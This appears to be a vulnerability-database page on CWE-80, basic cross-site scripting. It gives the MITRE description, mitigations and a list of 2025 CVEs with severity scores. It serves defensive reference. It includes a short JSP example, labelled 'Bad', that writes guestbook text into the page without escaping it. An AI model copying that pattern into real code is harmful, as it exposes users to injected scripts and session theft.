Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%
Buy Us a Coffee

CWE-80 (Web页面中脚本相关HTML标签转义处理不恰当(基本跨站脚本)) — Vulnerability Class 403

403 vulnerabilities classified as CWE-80 (Web页面中脚本相关HTML标签转义处理不恰当(基本跨站脚本)). AI Chinese analysis included.

CWE-80 represents a critical input validation weakness where applications fail to properly sanitize user-supplied data before rendering it in web pages. This flaw allows attackers to inject malicious scripts, typically JavaScript, into the HTML content viewed by other users. Exploitation usually occurs when an attacker crafts a malicious URL or form input containing script tags, which the vulnerable application then executes in the victim’s browser without proper filtering. This can lead to severe consequences such as session hijacking, credential theft, or defacement. To mitigate this risk, developers must implement robust output encoding strategies, ensuring that all special characters like angle brackets and ampersands are converted into their safe HTML entity equivalents. Additionally, employing Content Security Policy headers and utilizing modern frameworks with built-in escaping mechanisms further reduces the attack surface by preventing the execution of unauthorized scripts.

MITRE CWE Description
The product receives input from an upstream component, but it does not neutralize or incorrectly neutralizes special characters such as "<", ">", and "&" that could be interpreted as web-scripting elements when they are sent to a downstream component that processes web pages.
Common Consequences (1)
Confidentiality, Integrity, AvailabilityRead Application Data, Execute Unauthorized Code or Commands
An attacker could insert special characters that are processed client-side in the context of the user's session.
Mitigations (4)
ImplementationCarefully check each input parameter against a rigorous positive specification (allowlist) defining the specific characters and format allowed. All input should be neutralized, not just parameters that the user is supposed to specify, but all data in the request, including hidden fields, cookies, headers, the URL itself, and so forth. A common mistake that leads to continuing XSS vulnerabilities i…
ImplementationUse and specify an output encoding that can be handled by the downstream component that is reading the output. Common encodings include ISO-8859-1, UTF-7, and UTF-8. When an encoding is not specified, a downstream component may choose a different encoding, either by assuming a default encoding or automatically inferring which encoding is being used, which can be erroneous. When the encodings are i…
ImplementationWith Struts, write all data from form beans with the bean's filter attribute set to true.
ImplementationTo help mitigate XSS attacks against the user's session cookie, set the session cookie to be HttpOnly. In browsers that support the HttpOnly feature (such as more recent versions of Internet Explorer and Firefox), this attribute can prevent the user's session cookie from being accessible to malicious client-side scripts that use document.cookie. This is not a complete solution, since HttpOnly is n…
Effectiveness: Defense in Depth
Examples (1)
In the following example, a guestbook comment isn't properly encoded, filtered, or otherwise neutralized for script-related tags before being displayed in a client browser.
<% for (Iterator i = guestbook.iterator(); i.hasNext(); ) { Entry e = (Entry) i.next(); %> <p>Entry #<%= e.getId() %></p> <p><%= e.getText() %></p> <% } %>
Bad · JSP
CVE IDTitleCVSSSeverityPublished
CVE-2025-66481 DeepChat's Incomplete XSS Fix Allows RCE through Mermaid Content — deepchat 9.7 Critical2025-12-09
CVE-2025-14186 Grandstream GXP1625 Network Status api.values.post cross site scripting — GXP1625 3.5 Low2025-12-07
CVE-2025-66512 Nextcloud Server vulnerable to XSS in SVG images when opened outside of Nextcloud — security-advisories 5.4 Medium2025-12-05
CVE-2025-54057 Apache SkyWalking: Stored XSS vulnerability — Apache SkyWalking 6.1 -2025-11-27
CVE-2025-64764 Astro is vulnerable to Reflected XSS via the server islands feature — astro 7.1 High2025-11-19
CVE-2025-58412 Fortinet FortiADC 安全漏洞 — FortiADC 4.2 Medium2025-11-19
CVE-2025-11267 VK All in One Expansion Unit <= 9.112.1 - Authenticated (Contributor+) Stored Cross-Site Scripting — VK All in One Expansion Unit 6.4 Medium2025-11-18
CVE-2025-11265 VK All in One Expansion Unit <= 9.112.1 - Authenticated (Contributor+) Stored Cross-Site Scripting — VK All in One Expansion Unit 6.4 Medium2025-11-18
CVE-2025-8386 AVEVA Application Server IDE Basic Cross-site Scripting — Application Server 6.9 Medium2025-11-14
CVE-2025-13180 Bdtask/CodeCanyon Wholesale Inventory Control and Inventory Management System edit_profile cross site scripting — Wholesale Inventory Control and Inventory Management System 3.5 Low2025-11-14
CVE-2025-13178 Bdtask/CodeCanyon SalesERP User Profile edit_profile cross site scripting — SalesERP 3.5 Low2025-11-14
CVE-2025-12753 Chart Expert <= 1.0 - Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode — Chart Expert 6.4 Medium2025-11-11
CVE-2025-11874 Slippy Slider – Responsive Touch Navigation Slider <= 2.0 - Authenticated (Contributor+) Stored Cross-Site Scripting — Slippy Slider – Responsive Touch Navigation Slider 5.4 Medium2025-11-11
CVE-2025-64187 OctoPrint is vulnerable to XSS through Action Command Notifications and Prompts — OctoPrint 6.1 -2025-11-07
CVE-2025-33110 IBM OpenPages Vulnerable to HTML Injection — OpenPages 5.4 Medium2025-11-06
CVE-2025-60244 WordPress TableOn plugin <= 1.0.5.1 - Content Injection vulnerability — TableOn 7.1 High2025-11-06
CVE-2025-49398 WordPress Easy Appointments plugin <= 3.12.14 - Content Injection vulnerability — Easy Appointments 6.5 Medium2025-11-06
CVE-2025-11745 Ad Inserter <= 2.8.7 - Authenticated (Contributor+) Stored Cross-Site Scripting via Custom Field — Ad Inserter – Ad Manager & AdSense Ads 6.4 Medium2025-11-05
CVE-2025-11987 Visual Link Preview <= 2.2.7 - Authenticated (Contributor+) Stored Cross-Site Scripting via visual-link-preview Shortcode — Visual Link Preview 6.4 Medium2025-11-05
CVE-2025-48884 Galette is vulnerable to XSS through Document Type — galette 6.1AIMediumAI2025-11-04
CVE-2025-53883 spacewalk-java has various XSS issues on search page — Container suse manager 5.0 6.1AIMediumAI2025-10-30
CVE-2025-39663 Cross Site Scripting through compromised remote site — Checkmk 6.1AIMediumAI2025-10-30
CVE-2025-36121 HTML Injection Vulnerability in a Specific URL Endpoint of the IBM OpenPages Application — OpenPages 5.4 Medium2025-10-27
CVE-2025-62936 WordPress xSmart theme <= 1.2.9.4 - Content Injection vulnerability — xSmart 4.3 Medium2025-10-27
CVE-2025-62897 WordPress WP Recipe Maker plugin < 10.1.0 - Content Injection vulnerability — WP Recipe Maker 5.3 Medium2025-10-27
CVE-2025-11823 ShopLentor – WooCommerce Builder for Elementor & Gutenberg +21 Modules – All in One Solution <= 3.2.4 - Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode — ShopLentor – All-in-One WooCommerce Growth & Store Enhancement Plugin 6.4 Medium2025-10-25
CVE-2025-11992 Multi Item Responsive Slider <= 1.0 - Cross-Site Request Forgery to Stored Cross-Site Scripting — Multi Item Responsive Slider 6.1 Medium2025-10-24
CVE-2025-58970 WordPress Doctreat theme <= 1.6.7 - Content Injection vulnerability — Doctreat 6.3 Medium2025-10-22
CVE-2025-62415 bagisto - Cross Site Scripting (XSS) in TinyMCE Image Upload (HTML) — bagisto 6.9 Medium2025-10-16
CVE-2025-62418 bagisto - Cross Site Scripting (XSS) in TinyMCE Image Upload (SVG) — bagisto 6.9 Medium2025-10-16

Vulnerabilities classified as CWE-80 (Web页面中脚本相关HTML标签转义处理不恰当(基本跨站脚本)) represent 403 CVEs. The CWE taxonomy describes the weakness; review individual CVEs for product-specific impact.